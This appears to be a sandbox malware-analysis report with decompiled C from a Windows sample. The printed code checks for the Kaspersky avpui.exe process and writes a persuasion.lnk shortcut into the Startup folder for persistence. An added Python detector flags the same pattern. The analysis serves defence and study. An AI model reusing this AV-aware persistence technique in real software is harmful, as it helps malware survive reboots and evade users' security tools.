22662->22663 22663->22259 22665 9a1369 Process32Next 22664->22665 22666 9a1380 22664->22666 22665->22664 22665->22666 22666->22660 22667->22266 22669 aacaa8 __initptd 22668->22669 22670 ab5091 __lock 71 API calls 22669->22670 22671 aacaaf 22670->22671 22673 aacada RtlDecodePointer 22671->22673 22677 aacb59 22671->22677 22675 aacaf1 DecodePointer 22673->22675 22673->22677 22682 aacb04 22675->22682 22676 aacbd6 __initptd 22676->22152 22689 aacbc7 22677->22689 22680 aacbbe 22681 aac984 __mtinitlocknum 3 API calls 22680->22681 22683 aacbc7 22681->22683 22682->22677 22684 aacb1b DecodePointer 22682->22684 22688 aacb2a DecodePointer DecodePointer 22682->22688 22694 ab4097 RtlEncodePointer 22682->22694 22687 aacbd4 22683->22687 22696 ab4fb8 LeaveCriticalSection 22683->22696 22695 ab4097 RtlEncodePointer 22684->22695 22687->22152 22688->22682 22690 aacbcd 22689->22690 22691 aacba7 22689->22691 22697 ab4fb8 LeaveCriticalSection 22690->22697 22691->22676 22693 ab4fb8 LeaveCriticalSection 22691->22693 22693->22680 22694->22682 22695->22682 22696->22687 22697->22691 22698->22016 22699->22024 22700->22030 22704 9bbfe9 109 API calls 4 library calls 22701->22704 22703 9bc069 22704->22703 22705->22043 22706->22052 22707->22058 22709 9ab824 22708->22709 22710 9ab83c 22709->22710 22733 9b8782 RaiseException __CxxThrowException@8 22709->22733 22712 9c2a0c ctype 6 API calls 22710->22712 22713 9ab842 22712->22713 22713->22080 22722 9ab846 LeaveCriticalSection RaiseException ctype 22713->22722 22715 9a89ea 22714->22715 22716 9a89e5 22714->22716 22734 9a705a 22715->22734 22742 9b8782 RaiseException __CxxThrowException@8 22716->22742 22720->22063 22721->22071 22722->22080 22723->22080 22724->22062 22725->22068 22727->22096 22728->22101 22729->22098 22730->22068 22731->22068 22732->22075 22735 9ac865 103 API calls 22734->22735 22737 9a7067 22735->22737 22736 9a706c 22736->22068 22737->22736 22743 9a7033 22737->22743 22739 9a7085 PostMessageA 22740 9a70a6 22739->22740 22740->22736 22744 
      [Control-flow graph node/edge listing for the preceding functions, not reproduced. The Windows calls reachable in it: CreateMutexA followed by GetLastError (the usual already-running check), CloseHandle, RegOpenKeyExA/RegCreateKeyExA/RegQueryValueExA/RegCloseKey alongside GetPrivateProfileIntA/GetPrivateProfileStringA, GetModuleHandleA/GetProcAddress, LoadLibraryW bracketed by ActivateActCtx/DeactivateActCtx, SetWindowsHookExA with GetCurrentThreadId (a thread-local hook), EnterCriticalSection/LeaveCriticalSection, RaiseException via __CxxThrowException@8, and window/GDI housekeeping (GetWindowLongA, SetWindowLongA, SetWindowPos, ShowWindow, UpdateWindow, SendMessageA, CallWindowProcA, GetPropA/RemovePropA, GlobalFindAtomA/GlobalDeleteAtom, GetWindowRect, GetWindowDC, GetSysColor/GetSysColorBrush, CreateSolidBrush, CreatePen, CreatePatternBrush, DeleteObject, GetViewportExtEx, LoadMenuW/LoadAcceleratorsW). The std::_Mutex, ctype, __EH_prolog3 and profile/registry helpers are consistent with statically linked MFC and CRT code rather than sample-specific logic.]

      Control-flow Graph

      C-Code - Quality: 68%
      			E009A13B0(intOrPtr __edx, void* __edi, void* __eflags, CHAR* _a4) {
      				signed int _v8;
      				char _v267;
      				char _v268;
      				char _v527;
      				char _v528;
      				char _v1551;
      				char _v1552;
      				char _v2575;
      				char _v2576;
      				char _v3599;
      				char _v3600;
      				short _v7612;
      				void* _v7616;
      				void* _v7620;
      				void* __ebx;
      				void* __esi;
      				signed int _t52;
      				void* _t54;
      				char* _t75;
      				intOrPtr* _t76;
      				intOrPtr* _t79;
      				intOrPtr* _t81;
      				intOrPtr* _t83;
      				intOrPtr* _t86;
      				intOrPtr* _t89;
      				intOrPtr* _t93;
      				void* _t95;
      				intOrPtr _t105;
      				signed int _t131;
      
      				_t128 = __edi;
      				_t113 = __edx;
      				E00AAB480(0x1dc0);
      				_t52 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t52 ^ _t131;
      				_t130 = _a4;
      					// E009A12C0 (decompiled below) returns the PID of "avpui.exe", the Kaspersky
      					// user-interface process, or 0. The Startup shortcut is written only when that
      					// process is running; the one-minute Sleep at the end is gated on it as well.
      					_t54 = E009A12C0(__edx, __edi, "avpui.exe"); // executed
      				if(_t54 != 0) {
      					_v3600 = 0;
      					E00AAB3F0( &_v3599, 0, 0x3ff);
      					_v1552 = 0;
      					E00AAB3F0( &_v1551, 0, 0x3ff);
      					_v2576 = 0;
      					E00AAB3F0( &_v2575, 0, 0x3ff);
      					_v268 = 0;
      					E00AAB3F0( &_v267, 0, 0x103);
      					_v528 = 0;
      					E00AAB3F0( &_v527, 0, 0x103);
      					_t130 = lstrcpyA;
      					// Decompiler artefact: the source operand of the first lstrcpyA was lost (it shows
      					// the import itself). From the SetPath call below it is the shortcut target path,
      					// most likely _a4. Three copies are made: _v268 (SetPath), _v528, _v3600 (working dir).
      					lstrcpyA( &_v268, lstrcpyA);
      					lstrcpyA( &_v528,  &_v268);
      					lstrcpyA( &_v3600,  &_v268);
      					// CSIDL 7 = CSIDL_STARTUP, the current user's Start Menu\Programs\Startup folder
      					// (the trailing __edi, _t95 are register noise; the real call has four arguments).
      					__imp__SHGetSpecialFolderPathA(0,  &_v1552, 7, 0, __edi, _t95);
      					// _v2576 = "<Startup>\persuasion.lnk": the shortcut that provides persistence.
      					lstrcpyA( &_v2576,  &_v1552);
      					lstrcatA( &_v2576, "\\");
      					lstrcatA( &_v2576, "persuasion.lnk");
      					// _strrchr(buf, '\\') takes two arguments; the first one shown is stack noise. The
      					// buffer is evidently _v3600 (it is copied into _v1552 and becomes the working
      					// directory, while _v2576 is still the full .lnk path when Save runs). A NUL is
      					// written right after the last backslash, leaving the target's directory with a
      					// trailing backslash. The NULL return is not checked, so a path without a
      					// backslash would write to address 1.
      					 *((char*)(E00AAB050( &_v2576,  &_v3600, 0x5c) + 1)) = 0;
      					lstrcpyA( &_v1552,  &_v3600); // _v1552 is reused as the working directory
      					__imp__CoInitialize(0);
      					_t75 =  &_v7616;
      					// CoCreateInstance(rclsid @0xaffdd0, NULL, CLSCTX_INPROC_SERVER, riid @0xadbaf0, &_v7616).
      					// The GUID bytes are not shown in the report; the vtable slots used below are those
      					// of IShellLinkA, which implies CLSID_ShellLink / IID_IShellLinkA.
      					__imp__CoCreateInstance(0xaffdd0, 0, 1, 0xadbaf0, _t75);
      					_t76 = _v7616;
      					_t105 =  *_t76;
      					if(_t75 >= 0) { // SUCCEEDED(hr)
      						 *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x50))))(_t76,  &_v268); // IShellLinkA::SetPath(target)
      						_t79 = _v7616;
      						 *((intOrPtr*)( *((intOrPtr*)( *_t79 + 0x2c))))(_t79, 0); // IShellLinkA::SetArguments(0)
      						_t81 = _v7616;
      						 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x1c))))(_t81, 0); // IShellLinkA::SetDescription(0)
      						_t83 = _v7616;
      						 *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x24))))(_t83,  &_v1552); // IShellLinkA::SetWorkingDirectory(dir)
      						_t86 = _v7616;
      						_push( &_v7620);
      						_push(0xaffd40);
      						_push(_t86);
      						// slot 0 = QueryInterface(riid @0xaffd40, &_v7620); the +0x18 call on the
      						// result is IPersistFile::Save, so the IID is IID_IPersistFile
      						if( *((intOrPtr*)( *((intOrPtr*)( *_t86))))() >= 0) {
      							// ANSI .lnk path to UTF-16: CP_ACP, NUL-terminated source, MAX_PATH (0x104) output
      							MultiByteToWideChar(0, 0,  &_v2576, 0xffffffff,  &_v7612, 0x104);
      							_t93 = _v7620;
      							 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 0x18))))(_t93,  &_v7612, 1); // IPersistFile::Save(path, fRemember=TRUE)
      						}
      						_t89 = _v7620;
      						 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89); // IPersistFile::Release
      						_t76 = _v7616;
      						_t105 =  *_t76;
      					}
      					_t113 =  *((intOrPtr*)(_t105 + 8));
      					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t105 + 8))))(); // IShellLinkA::Release
      					__imp__CoUninitialize();
      					Sleep(0xea60); // 60 000 ms: a one-minute pause after dropping the shortcut
      					_t128 = _t76;
      					_pop(_t95);
      				}
      				return E00AAB46A(_t54, _t95, _v8 ^ _t131, _t113, _t128, _t130);
      			}
      Instruction addresses for the listing above (side-by-side column collapsed): 0x009a13b0 through 0x009a15f5.

      APIs
        • Part of subcall function 009A12C0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009A12E3
        • Part of subcall function 009A12C0: Process32First.KERNEL32(00000000,?), ref: 009A12FD
      • _memset.LIBCMT ref: 009A13F7
      • _memset.LIBCMT ref: 009A140F
      • _memset.LIBCMT ref: 009A1427
      • _memset.LIBCMT ref: 009A143F
      • _memset.LIBCMT ref: 009A1457
      • lstrcpyA.KERNEL32(?,?), ref: 009A146D
      • lstrcpyA.KERNEL32(?,?), ref: 009A147D
      • lstrcpyA.KERNEL32(?,?), ref: 009A148D
      • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 009A149A
      • lstrcpyA.KERNEL32(?,?), ref: 009A14AE
      • lstrcatA.KERNEL32(?,00AD6DF8), ref: 009A14C2
      • lstrcatA.KERNEL32(?,persuasion.lnk), ref: 009A14D0
      • _strrchr.LIBCMT ref: 009A14DB
      • lstrcpyA.KERNEL32(?,?), ref: 009A14F4
      • CoInitialize.OLE32(00000000), ref: 009A14F7
      • CoCreateInstance.OLE32(00AFFDD0,00000000,00000001,00ADBAF0,?), ref: 009A1511
      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009A159B
      • CoUninitialize.OLE32 ref: 009A15D4
      • Sleep.KERNEL32(0000EA60), ref: 009A15DF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memsetlstrcpy$Createlstrcat$ByteCharFirstFolderInitializeInstanceMultiPathProcess32SleepSnapshotSpecialToolhelp32UninitializeWide_strrchr
      • String ID: avpui.exe$persuasion.lnk
      • API String ID: 179343930-886163282
      • Opcode ID: dd5e9ebfa9602df55489b87e24358bba9188dc035a80fd7794675620d2ca2636
      • Instruction ID: 8b596e64ec5ca0a07cd3537373e635838dc93a1f1ecb8e97f5b4fee1d91a02f5
      • Opcode Fuzzy Hash: dd5e9ebfa9602df55489b87e24358bba9188dc035a80fd7794675620d2ca2636
      • Instruction Fuzzy Hash: B36132B5A50218AFDB10DB64CC85EDA77BCEF49304F0086DAF50A97291D774AE85CF60
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 79%
      			E009A12C0(struct tagPROCESSENTRY32W __edx, void* __edi, intOrPtr* _a4) {
      				signed int _v8;
      				char _v268;
      				int _v296;
      				void* _v304;
      				int _v308;
      				void* __ebx;
      				void* __esi;
      				signed int _t18;
      				void* _t20;
      				int _t22;
      				intOrPtr* _t27;
      				intOrPtr* _t35;
      				intOrPtr* _t40;
      				void* _t41;
      				signed int _t42;
      
      				_t39 = __edi;
      				_t38 = __edx;
      				_t18 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t18 ^ _t42;
      				_v308 = 0; // result: PID of the matching process, 0 if none
      				_t20 = CreateToolhelp32Snapshot(2, 0); // executed; 2 = TH32CS_SNAPPROCESS
      				_t41 = _t20;
      				_v304 = 0x128; // PROCESSENTRY32 (ANSI) dwSize = 296, required before every call
      				_t22 = Process32First(_t41,  &_v304); // executed
      				if(_t22 != 0) {
      					_v304 = 0x128;
      					// the Process32First entry is never compared; matching starts with Process32Next
      					if(Process32Next(_t41,  &_v304) != 0) {
      						_push(__edi);
      						_t40 = _a4;
      						do {
      							// inlined strcmp of szExeFile (entry offset 0x24, here _v268) against _a4:
      							// byte-exact and case-sensitive, two characters per iteration
      							_t35 = _t40;
      							_t27 =  &_v268;
      							while(1) {
      								_t38 =  *_t27;
      								if(_t38 !=  *_t35) {
      									break;
      								}
      								if(_t38 == 0) {
      									L9:
      									_t27 = 0;
      								} else {
      									_t38 =  *((intOrPtr*)(_t27 + 1));
      									if(_t38 !=  *((intOrPtr*)(_t35 + 1))) {
      										break;
      									} else {
      										_t27 = _t27 + 2;
      										_t35 = _t35 + 2;
      										if(_t38 != 0) {
      											continue;
      										} else {
      											goto L9;
      										}
      									}
      								}
      								L11:
      								if(_t27 == 0) {
      									_v308 = _v296; // names equal: return th32ProcessID (entry offset 8)
      								} else {
      									goto L12;
      								}
      								L15:
      								_pop(_t39);
      								goto L16;
      							}
      							asm("sbb eax, eax");
      							asm("sbb eax, 0xffffffff");
      							goto L11;
      							L12:
      							_t38 =  &_v304;
      							_v304 = 0x128;
      						} while (Process32Next(_t41,  &_v304) != 0);
      						goto L15;
      					}
      					L16:
      					// FindCloseChangeNotification is an alias of CloseHandle (same export address),
      					// which is why the resolver names it this way: the snapshot handle is closed
      					FindCloseChangeNotification(_t41); // executed
      					return E00AAB46A(_v308, 0x128, _v8 ^ _t42, _t38, _t39, _t41); // PID found, or 0
      				} else {
      					return E00AAB46A(_t22, 0x128, _v8 ^ _t42, _t38, __edi, _t41); // Process32First failed: returns 0
      				}
      			}
      Instruction addresses for the listing above (side-by-side column collapsed): 0x009a12c0 through 0x009a13ab.

      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009A12E3
      • Process32First.KERNEL32(00000000,?), ref: 009A12FD
      • Process32Next.KERNEL32 ref: 009A1324
      • Process32Next.KERNEL32 ref: 009A1377
      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?), ref: 009A1390
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Process32$Next$ChangeCloseCreateFindFirstNotificationSnapshotToolhelp32
      • String ID:
      • API String ID: 4072508860-0
      • Opcode ID: 1a0dcd5f53f28b01e0b2d686bc6f9dbf846712b75ce0cc179c7fe60369c3bb30
      • Instruction ID: cd96c74506ade7eedf5d6284237a97be51b87b3885a1dd3ba08b828a82c23613
      • Opcode Fuzzy Hash: 1a0dcd5f53f28b01e0b2d686bc6f9dbf846712b75ce0cc179c7fe60369c3bb30
      • Instruction Fuzzy Hash: A8219271A042189BCF209F349D91BEEB7ADEF4B350F0445DAE94997241EB319E488BD0
      Uniqueness

      Uniqueness Score: -1.00%
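      The two functions above, E009A13B0 and E009A12C0, together implement the persistence the report flags as "Stores files to the Windows start menu directory": look for a process named avpui.exe and, if it is running, drop persuasion.lnk into the user's Startup folder through IShellLinkA and IPersistFile. The Python below is an added example written for this page; it is not code from the report, the sandbox, or the sample. It mirrors the path and process-name handling of the decompiled functions in portable form and runs a detector for the pattern over constructed API-trace lines. The trace line format, the Startup path, the process list, the GUID values (the documented CLSID_ShellLink and IID values, which the report shows only as addresses) and every function name are assumptions made here.

```python
"""Added example for this report page; not code from the report or the sample.

derive_shortcut_paths()   mirrors the buffer handling of E009A13B0
find_pid_like_sample()    mirrors the process-name match of E009A12C0
detect_startup_shortcut() flags the Startup-folder .lnk pattern in an API trace
Trace format, paths and GUID constants below are assumptions.
"""
import re
from typing import Iterable, List, Optional, Tuple

CSIDL_STARTUP = 0x0007         # value the sample passes to SHGetSpecialFolderPathA
CSIDL_COMMON_STARTUP = 0x0018  # all-users Startup folder, covered as well (assumption)
# Documented Windows GUID for ShellLink; the report shows only the address of the constant.
CLSID_SHELLLINK = "{00021401-0000-0000-c000-000000000046}"


def derive_shortcut_paths(target_path: str, startup_dir: str,
                          link_name: str = "persuasion.lnk") -> Tuple[str, str]:
    """Return (lnk_path, working_dir) the way E009A13B0 builds them.

    The sample writes a NUL right after the last backslash of a copy of the
    target path without checking that _strrchr found one; a path with no
    backslash would dereference address 1. Raise instead of faulting.
    """
    lnk_path = startup_dir + "\\" + link_name
    head, sep, _ = target_path.rpartition("\\")
    if not sep:
        raise ValueError("target path has no backslash; the sample would fault here")
    return lnk_path, head + sep      # trailing backslash kept, as in the sample


def find_pid_like_sample(name: str, entries: List[Tuple[int, str]]) -> int:
    """PID whose szExeFile equals name, else 0, as E009A12C0 does.

    entries are (th32ProcessID, szExeFile) pairs in snapshot order. The first
    entry (Process32First) is never compared, and the compare is a byte-exact
    inlined strcmp, so "AVPUI.EXE" does not match "avpui.exe".
    """
    for pid, exe in entries[1:]:
        if exe == name:
            return pid
    return 0


_CALL_RE = re.compile(r"^(?P<api>[A-Za-z0-9_:]+)\((?P<args>.*)\)(?:\s*->\s*(?P<ret>.*))?$")


def parse_call(line: str) -> Optional[Tuple[str, List[str], str]]:
    """Parse 'Api(arg, arg) -> ret' (constructed format; arguments must not contain commas)."""
    m = _CALL_RE.match(line.strip())
    if m is None:
        return None
    raw = m.group("args")
    args = [a.strip().strip('"') for a in raw.split(",")] if raw.strip() else []
    return m.group("api"), args, (m.group("ret") or "").strip().strip('"')


def _as_int(text: str) -> Optional[int]:
    try:
        return int(text, 0)
    except ValueError:
        return None


def detect_startup_shortcut(trace: Iterable[str]) -> Optional[dict]:
    """Flag SHGetSpecialFolderPath*(CSIDL_STARTUP) followed by CoCreateInstance(CLSID_ShellLink)
    and an IPersistFile::Save of a .lnk under that folder (ATT&CK T1547.001)."""
    startup_dirs: List[str] = []
    shelllink_seen = False
    for line in trace:
        parsed = parse_call(line)
        if parsed is None:
            continue
        api, args, ret = parsed
        if api.startswith("SHGetSpecialFolderPath") and len(args) >= 3 and ret:
            if _as_int(args[2]) in (CSIDL_STARTUP, CSIDL_COMMON_STARTUP):
                startup_dirs.append(ret.lower())
        elif api == "CoCreateInstance" and args and args[0].lower() == CLSID_SHELLLINK:
            shelllink_seen = True
        elif api == "IPersistFile::Save" and args and shelllink_seen:
            path = args[0].lower()
            if path.endswith(".lnk") and any(path.startswith(d + "\\") for d in startup_dirs):
                return {"technique": "T1547.001 Startup folder shortcut", "lnk": args[0]}
    return None


# Constructed trace modelled on the API list of E009A13B0; not sandbox output.
STARTUP = "C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
SAMPLE_TRACE = [
    "CreateToolhelp32Snapshot(0x2, 0x0) -> 0x1a4",
    "Process32First(0x1a4, 0x19fd20) -> 1",
    f'SHGetSpecialFolderPathA(0x0, 0x19fd60, 0x7, 0x0) -> "{STARTUP}"',
    "CoInitialize(0x0) -> 0",
    "CoCreateInstance({00021401-0000-0000-C000-000000000046}, 0x0, 0x1, "
    "{000214EE-0000-0000-C000-000000000046}, 0x19fd40) -> 0",
    'IShellLinkA::SetPath("C:\\Users\\victim\\Desktop\\cANdLlHS4N.exe") -> 0',
    'IShellLinkA::SetWorkingDirectory("C:\\Users\\victim\\Desktop\\") -> 0',
    f'IPersistFile::Save("{STARTUP}\\persuasion.lnk", 1) -> 0',
    "CoUninitialize()",
    "Sleep(0xea60)",
]

if __name__ == "__main__":
    print(detect_startup_shortcut(SAMPLE_TRACE))
```

      The detector keys on the resolved Startup folder rather than on the literal name persuasion.lnk, so a rebuilt sample with a different file name still triggers it; the case-sensitive compare in find_pid_like_sample() is reproduced on purpose, since it means the AV-gated branch only fires when the process name matches byte for byte.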

      Control-flow Graph

      C-Code - Quality: 95%
      			E009BF8B8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t109;
      				signed int _t111;
      				long _t114;
      				long _t115;
      				long _t116;
      				long _t117;
      				long _t118;
      				long _t119;
      				long _t124;
      				long _t135;
      				struct HBRUSH__* _t136;
      				struct HBRUSH__* _t137;
      				struct HBRUSH__* _t139;
      				struct HBRUSH__* _t141;
      				struct HPEN__* _t162;
      				long _t198;
      				long _t200;
      				signed int _t203;
      				signed char _t237;
      				void* _t252;
      				void* _t257;
      				void* _t264;
      				void* _t266;
      				void* _t268;
      
      				_t245 = __edx;
      				_push(0x20);
      				E00AAD232(0xac8ecd, __ebx, __edi, __esi);
      				_t256 = __ecx;
      				_t252 = GetSysColor;
      				// Matches MFC's AFX_GLOBAL_DATA::UpdateSysColors (afxglobals.cpp): the two tests set the
      				// black/white high-contrast flags (COLOR_3DLIGHT == white && COLOR_3DFACE == black;
      				// COLOR_3DDKSHADOW == black && COLOR_3DFACE == white). Library code, not sample behaviour.
      				if(GetSysColor(0x16) != 0xffffff) {
      					L3:
      					_t109 = 0;
      					__eflags = 0;
      				} else {
      					_t200 = GetSysColor(0xf);
      					if(_t200 != 0) {
      						goto L3;
      					} else {
      						_t109 = _t200 + 1;
      					}
      				}
      				 *((intOrPtr*)(_t256 + 0x184)) = _t109;
      				if(GetSysColor(0x15) != 0) {
      					L7:
      					_t111 = 0;
      					__eflags = 0;
      				} else {
      					_t198 = GetSysColor(0xf);
      					_t262 = _t198 - 0xffffff;
      					if(_t198 != 0xffffff) {
      						goto L7;
      					} else {
      						_t111 = 1;
      					}
      				}
      				_t203 = 0;
      				_push(0);
      				 *((intOrPtr*)(_t256 + 0x188)) = _t111;
      				E009BAE6D(0, _t257 - 0x2c, _t245, _t252, _t256, _t262);
      				 *(_t257 - 4) = 0;
      				 *((intOrPtr*)(_t256 + 0x1ac)) = GetDeviceCaps( *(_t257 - 0x24), 0xc);
      				_t114 = GetSysColor(0xf);
      				 *(_t256 + 0x14) = _t114;
      				 *(_t256 + 0x4c) = _t114;
      				_t115 = GetSysColor(0x10);
      				 *(_t256 + 0x18) = _t115;
      				 *(_t256 + 0x50) = _t115;
      				_t116 = GetSysColor(0x15);
      				 *(_t256 + 0x28) = _t116;
      				 *(_t256 + 0x58) = _t116;
      				_t117 = GetSysColor(0x16);
      				 *(_t256 + 0x2c) = _t117;
      				 *(_t256 + 0x5c) = _t117;
      				_t118 = GetSysColor(0x14);
      				 *(_t256 + 0x1c) = _t118;
      				 *(_t256 + 0x54) = _t118;
      				_t119 = GetSysColor(0x12);
      				 *(_t256 + 0x20) = _t119;
      				 *(_t256 + 0x60) = _t119;
      				 *((intOrPtr*)(_t256 + 0x30)) = GetSysColor(0x11);
      				 *((intOrPtr*)(_t256 + 0x24)) = GetSysColor(6);
      				 *(_t256 + 0x34) = GetSysColor(0xd);
      				 *((intOrPtr*)(_t256 + 0x38)) = GetSysColor(0xe);
      				_t124 = GetSysColor(5);
      				 *(_t256 + 0x64) = _t124;
      				 *(_t256 + 0x48) = _t124;
      				 *(_t256 + 0x68) = GetSysColor(8);
      				 *((intOrPtr*)(_t256 + 0x6c)) = GetSysColor(9);
      				 *((intOrPtr*)(_t256 + 0x70)) = GetSysColor(7);
      				 *(_t256 + 0x74) = GetSysColor(2);
      				 *(_t256 + 0x78) = GetSysColor(3);
      				 *((intOrPtr*)(_t256 + 0x80)) = GetSysColor(0x1b);
      				 *((intOrPtr*)(_t256 + 0x84)) = GetSysColor(0x1c);
      				 *((intOrPtr*)(_t256 + 0x88)) = GetSysColor(0xa);
      				 *((intOrPtr*)(_t256 + 0x8c)) = GetSysColor(0xb);
      				 *((intOrPtr*)(_t256 + 0x7c)) = GetSysColor(0x13);
      				if( *((intOrPtr*)(_t256 + 0x184)) == 0) {
      					_t135 = GetSysColor(0x1a);
      					 *(_t256 + 0x40) = 0xff0000;
      					 *(_t256 + 0x44) = 0x800080;
      				} else {
      					_t135 =  *(_t256 + 0x68);
      					 *(_t256 + 0x40) = _t135;
      					 *(_t256 + 0x44) = _t135;
      				}
      				 *(_t256 + 0x3c) = _t135;
      				_t136 = GetSysColorBrush(0x10);
      				_t264 = _t136 - _t203;
      				_t208 = 0 | _t264 != 0x00000000;
      				 *(_t256 + 0xc) = _t136;
      				if(_t264 != 0 == _t203) {
      					L12:
      					E009B8782(_t208);
      				}
      				_t137 = GetSysColorBrush(0x14);
      				_t266 = _t137 - _t203;
      				_t208 = 0 | _t266 != 0x00000000;
      				 *(_t256 + 8) = _t137;
      				if(_t266 != 0 == _t203) {
      					goto L12;
      				}
      				_t139 = GetSysColorBrush(5);
      				_t268 = _t139 - _t203;
      				_t208 = 0 | _t268 != 0x00000000;
      				 *(_t256 + 0x10) = _t139;
      				if(_t268 != 0 == _t203) {
      					goto L12;
      				}
      				E009BB072(_t256 + 0x90);
      				_t254 = CreateSolidBrush; // executed
      				_t141 = CreateSolidBrush( *(_t256 + 0x14)); // executed
      				E009BB018(_t203, _t256 + 0x90, _t245, CreateSolidBrush, _t141);
      				E009BB072(_t256 + 0xc8);
      				E009BB018(_t203, _t256 + 0xc8, _t245, CreateSolidBrush, CreateSolidBrush( *(_t256 + 0x4c)));
      				E009BB072(_t256 + 0xb0);
      				E009BB018(_t203, _t256 + 0xb0, _t245, _t254, CreateSolidBrush( *(_t256 + 0x74)));
      				E009BB072(_t256 + 0xb8);
      				E009BB018(_t203, _t256 + 0xb8, _t245, _t254, CreateSolidBrush( *(_t256 + 0x78)));
      				E009BB072(_t256 + 0x98);
      				E009BB018(_t203, _t256 + 0x98, _t245, _t254, CreateSolidBrush( *(_t256 + 0x34)));
      				E009BB072(_t256 + 0xa8);
      				E009BB018(_t203, _t256 + 0xa8, _t245, _t254, CreateSolidBrush( *(_t256 + 0x28)));
      				E009BB072(_t256 + 0xc0);
      				E009BB018(_t203, _t256 + 0xc0, _t245, _t254, CreateSolidBrush( *(_t256 + 0x64)));
      				E009BB072(_t256 + 0xd0);
      				_t204 = CreatePen;
      				_t162 = CreatePen(0, 1,  *0xd0fde4); // executed
      				E009BB018(CreatePen, _t256 + 0xd0, _t245, _t254, _t162);
      				E009BB072(_t256 + 0xd8);
      				E009BB018(CreatePen, _t256 + 0xd8, _t245, _t254, CreatePen(0, 1,  *0xd0fdfc));
      				E009BB072(_t256 + 0xe0);
      				E009BB018(_t204, _t256 + 0xe0, _t245, _t254, CreatePen(0, 1,  *0xd0fe00));
      				_t203 = _t256 + 0xa0;
      				if(_t203 != 0 &&  *((intOrPtr*)(_t203 + 4)) != 0) {
      					E009BB072(_t203);
      				}
      				if( *((intOrPtr*)(_t256 + 0x1ac)) <= 8) {
      					__eflags = E009BE955(_t203,  *((intOrPtr*)(_t257 - 0x28)));
      					_t208 = 0 | __eflags != 0x00000000;
      					if(__eflags == 0) {
      						goto L12;
      					} else {
      						_t94 = _t257 - 0x14;
      						 *_t94 =  *(_t257 - 0x14) & 0x00000000;
      						__eflags =  *_t94;
      						_t256 = 0xad7e64;
      						 *((intOrPtr*)(_t257 - 0x18)) = 0xad7e64;
      						 *(_t257 - 4) = 1;
      						E009BB018(_t203, _t257 - 0x18, _t245, _t254, _t170);
      						E009BB018(_t203, _t203, _t245, _t254, CreatePatternBrush( *(_t257 - 0x14)));
      						 *(_t257 - 4) = 0;
      						 *((intOrPtr*)(_t257 - 0x18)) = 0xad7e64;
      						E009A93B2(_t203, _t257 - 0x18, _t254, 0xad7e64, __eflags);
      					}
      				} else {
      					_t237 =  *((intOrPtr*)(_t256 + 0x16));
      					 *(_t257 - 0xd) =  *(_t256 + 0x14);
      					_t246 = _t237 & 0x000000ff;
      					asm("cdq");
      					_t247 =  *(_t256 + 0x15) & 0x000000ff;
      					asm("cdq");
      					_t245 =  *(_t257 - 0xd) & 0x000000ff;
      					asm("cdq");
